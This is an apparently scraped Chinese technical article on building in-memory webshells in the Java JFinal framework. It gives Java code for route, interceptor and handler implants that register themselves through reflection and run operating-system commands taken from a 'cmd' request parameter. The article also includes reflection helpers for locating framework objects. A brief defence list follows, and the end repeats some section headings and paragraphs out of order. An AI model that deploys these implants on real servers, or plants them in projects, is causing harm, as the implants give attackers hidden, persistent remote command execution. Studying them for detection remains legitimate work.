JFinal框架内存马构造技术详解<\/h1>

1. 环境搭建与基础概念<\/h2>
JFinal是基于Java语言的极速WEB + ORM框架，具有开发迅速、代码量少、学习简单等特点。在JFinal-undertow环境下开发，基于JFinal的web项目需要创建一个继承自JFinalConfig类的子类，该类用于对整个web项目进行配置。<\/p>
关键配置方法：<\/p>
configRoute()<\/code> - 配置路由<\/li>
configInterceptor()<\/code> - 配置拦截器<\/li>
configHandler()<\/code> - 配置处理器<\/li>
<\/ul>
新版本中Routes提供了scan()<\/code>方法自动扫描指定包下的控制器(带注解)来注册路由。<\/p>
2. 路由内存马构造<\/h2>
2.1 基本原理<\/h3>
JFinal框架通过Routes.add()<\/code>方法注册路由：<\/p>
public<\/span> Routes add<\/span>(<\/span>String controllerPath,<\/span> Class<?<\/span> extends<\/span> Controller><\/span> controllerClass)<\/span> {<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>add<\/span>(<\/span>controllerPath,<\/span> controllerClass,<\/span> controllerPath);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2.2 实现步骤<\/h3>


获取关键对象<\/strong>：<\/p>

通过线程上下文获取JFinalFilter<\/code><\/li>
从JFinalFilter<\/code>获取actionMapping<\/code>和routes<\/code><\/li>
<\/ul>
<\/li>

关键代码实现<\/strong>：<\/p>
<\/li>
<\/ol>
static<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Thread thread =<\/span> Thread.<\/span>currentThread<\/span>();<\/span>
<\/span><\/span>        Object obj =<\/span> getField(<\/span>thread,<\/span> "threadLocals"<\/span>);<\/span>
<\/span><\/span>        Object table =<\/span> getField(<\/span>obj,<\/span> "table"<\/span>);<\/span>
<\/span><\/span>        \/\/ 遍历threadLocals查找关键对象
<\/span><\/span><\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>        if<\/span> (<\/span>o.<\/span>getClass<\/span>().<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"ManagedFilter"<\/span>))<\/span> {<\/span>
<\/span><\/span>            JFinalFilter filter =<\/span> (<\/span>JFinalFilter)<\/span> getField(<\/span>o,<\/span> "filter"<\/span>);<\/span>
<\/span><\/span>            JFinal jfinal =<\/span> (<\/span>JFinal)<\/span> getField(<\/span>filter,<\/span> "jfinal"<\/span>);<\/span>
<\/span><\/span>            actionMapping =<\/span> (<\/span>ActionMapping)<\/span> getField(<\/span>jfinal,<\/span> "actionMapping"<\/span>);<\/span>
<\/span><\/span>            routes =<\/span> (<\/span>Routes)<\/span> getField(<\/span>actionMapping,<\/span> "routes"<\/span>);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
构造恶意控制器<\/strong>：<\/li>
<\/ol>
public<\/span> class<\/span> ShellController<\/span> extends<\/span> Controller {<\/span>
<\/span><\/span>    public<\/span> void<\/span> index<\/span>()<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        String cmd =<\/span> getPara(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
添加恶意路由<\/strong>：<\/li>
<\/ol>
Method index =<\/span> ShellController.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"index"<\/span>);<\/span>
<\/span><\/span>Action shellaction =<\/span> new<\/span> Action(<\/span>"\/controllershell"<\/span>,<\/span> "\/controllershell"<\/span>,<\/span> 
<\/span><\/span>    ShellController.<\/span>class<\/span>,<\/span> index,<\/span> index.<\/span>getName<\/span>(),<\/span> 
<\/span><\/span>    new<\/span> Interceptor[]{<\/span>new<\/span> Demo1Interceptor()},<\/span> "\/controllershell\/"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>Map mapping =<\/span> (<\/span>Map)<\/span> getField(<\/span>actionMapping,<\/span> "mapping"<\/span>);<\/span>
<\/span><\/span>mapping.<\/span>put<\/span>(<\/span>"\/controllershell"<\/span>,<\/span> shellaction);<\/span>
<\/span><\/span><\/code><\/pre>3. 拦截器内存马构造<\/h2>
3.1 基本原理<\/h3>
JFinal的拦截器在com.jfinal.aop.Invocation#invoke<\/code>中执行，通过修改现有Action的拦截器数组可以实现内存马。<\/p>
3.2 实现步骤<\/h3>

构造恶意拦截器<\/strong>：<\/li>
<\/ol>
public<\/span> class<\/span> ShellInterceptor<\/span> implements<\/span> Interceptor {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> intercept<\/span>(<\/span>Invocation invocation)<\/span> {<\/span>
<\/span><\/span>        Controller controller =<\/span> invocation.<\/span>getController<\/span>();<\/span>
<\/span><\/span>        if<\/span> (<\/span>controller.<\/span>getPara<\/span>(<\/span>"cmd"<\/span>)<\/span> !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>controller.<\/span>getPara<\/span>(<\/span>"cmd"<\/span>));<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>                e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        invocation.<\/span>invoke<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
修改现有Action的拦截器<\/strong>：<\/li>
<\/ol>
Action helloAction =<\/span> (<\/span>Action)<\/span> mapping.<\/span>get<\/span>(<\/span>"\/hello"<\/span>);<\/span>
<\/span><\/span>Interceptor[]<\/span> interceptors =<\/span> new<\/span> Interceptor[<\/span>1<\/span>];<\/span>
<\/span><\/span>interceptors[<\/span>0<\/span>]<\/span> =<\/span> new<\/span> ShellInterceptor();<\/span>
<\/span><\/span>
<\/span><\/span>Field field =<\/span> helloAction.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"interceptors"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>field.<\/span>set<\/span>(<\/span>helloAction,<\/span> interceptors);<\/span>
<\/span><\/span><\/code><\/pre>4. 处理器内存马构造<\/h2>
4.1 基本原理<\/h3>
JFinal的处理器(Handler)采用责任链模式，通过修改处理器链可以在请求处理流程中插入恶意处理器。<\/p>
4.2 实现步骤<\/h3>

构造恶意处理器<\/strong>：<\/li>
<\/ol>
public<\/span> class<\/span> ShellHandler<\/span> extends<\/span> Handler {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> void<\/span> handle<\/span>(<\/span>String s,<\/span> HttpServletRequest httpServletRequest,<\/span> 
<\/span><\/span>            HttpServletResponse httpServletResponse,<\/span> boolean<\/span>[]<\/span> booleans)<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>s.<\/span>equals<\/span>(<\/span>"\/cmd"<\/span>))<\/span> {<\/span>
<\/span><\/span>            String cmd =<\/span> httpServletRequest.<\/span>getParameter<\/span>(<\/span>"cmd"<\/span>);<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd);<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>IOException e)<\/span> {<\/span>
<\/span><\/span>                e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>        next.<\/span>handle<\/span>(<\/span>s,<\/span> httpServletRequest,<\/span> httpServletResponse,<\/span> booleans);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
插入处理器链<\/strong>：<\/li>
<\/ol>
Field next =<\/span> handler.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"next"<\/span>);<\/span>
<\/span><\/span>next.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Handler o =<\/span> (<\/span>Handler)<\/span> next.<\/span>get<\/span>(<\/span>handler);<\/span>
<\/span><\/span>
<\/span><\/span>Handler shellhandler =<\/span> new<\/span> ShellHandler();<\/span>
<\/span><\/span>Field next1 =<\/span> shellhandler.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"next"<\/span>);<\/span>
<\/span><\/span>next1.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>next1.<\/span>set<\/span>(<\/span>shellhandler,<\/span> o);<\/span>
<\/span><\/span>next.<\/span>set<\/span>(<\/span>handler,<\/span> shellhandler);<\/span>
<\/span><\/span><\/code><\/pre>5. 关键工具方法<\/h2>
5.1 反射获取字段值<\/h3>
public<\/span> static<\/span> Object getField<\/span>(<\/span>Object o,<\/span> String s)<\/span> throws<\/span> NoSuchFieldException,<\/span> IllegalAccessException {<\/span>
<\/span><\/span>    Field field;<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        field =<\/span> o.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>s);<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>NoSuchFieldException e)<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            field =<\/span> o.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>s);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>Exception e1)<\/span> {<\/span>
<\/span><\/span>            field =<\/span> o.<\/span>getClass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getSuperclass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>s);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>    return<\/span> field.<\/span>get<\/span>(<\/span>o);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>5.2 遍历处理器链<\/h3>
public<\/span> static<\/span> Object getParentNext<\/span>(<\/span>Object handler)<\/span> {<\/span>
<\/span><\/span>    Object current =<\/span> handler;<\/span>
<\/span><\/span>    Object current1 =<\/span> current;<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        Class<?><\/span> clazz =<\/span> current.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>        while<\/span> (<\/span>clazz !=<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>            Field nextField =<\/span> null<\/span>;<\/span>
<\/span><\/span>            try<\/span> {<\/span>
<\/span><\/span>                nextField =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>"next"<\/span>);<\/span>
<\/span><\/span>            }<\/span> catch<\/span> (<\/span>NoSuchFieldException e)<\/span> {<\/span>
<\/span><\/span>                clazz =<\/span> clazz.<\/span>getSuperclass<\/span>();<\/span>
<\/span><\/span>                if<\/span> (<\/span>clazz ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                    break<\/span>;<\/span>
<\/span><\/span>                }<\/span>
<\/span><\/span>                continue<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>            nextField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>            current1 =<\/span> current;<\/span>
<\/span><\/span>            current =<\/span> nextField.<\/span>get<\/span>(<\/span>current);<\/span>
<\/span><\/span>            if<\/span> (<\/span>current ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>                break<\/span>;<\/span>
<\/span><\/span>            }<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>IllegalAccessException e)<\/span> {<\/span>
<\/span><\/span>        e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> current1;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6. 防御建议<\/h2>

对JFinal框架的关键配置进行权限控制<\/li>
监控内存中路由、拦截器和处理器的异常变化<\/li>
限制反射操作的使用<\/li>
对执行命令的操作进行严格过滤<\/li>
<\/ol>
7. 总结<\/h2>
本文详细分析了JFinal框架中三种内存马的构造方法：<\/p>

路由内存马<\/strong> - 通过修改ActionMapping中的路由映射<\/li>
拦截器内存马<\/strong> - 通过修改Action中的拦截器数组<\/li>
处理器内存马<\/strong> - 通过插入处理器责任链<\/li>
<\/ol>
每种方法都有其特点和适用场景，理解这些技术有助于更好地防御此类攻击。<\/p>
JFinal框架内存马构造技术详解<\/h1>

3. 拦截器内存马构造<\/h2>

3.1 基本原理<\/h3> JFinal的拦截器在com.jfinal.aop.Invocation#invoke<\/code>中执行，通过修改现有Action的拦截器数组可以实现内存马。<\/p>

4. 处理器内存马构造<\/h2>

4.1 基本原理<\/h3> JFinal的处理器(Handler)采用责任链模式，通过修改处理器链可以在请求处理流程中插入恶意处理器。<\/p>

5. 关键工具方法<\/h2>

3.1 基本原理<\/h3>
JFinal的拦截器在`com.jfinal.aop.Invocation#invoke<\/code>中执行，通过修改现有Action的拦截器数组可以实现内存马。<\/p>`

4.1 基本原理<\/h3>
JFinal的处理器(Handler)采用责任链模式，通过修改处理器链可以在请求处理流程中插入恶意处理器。<\/p>
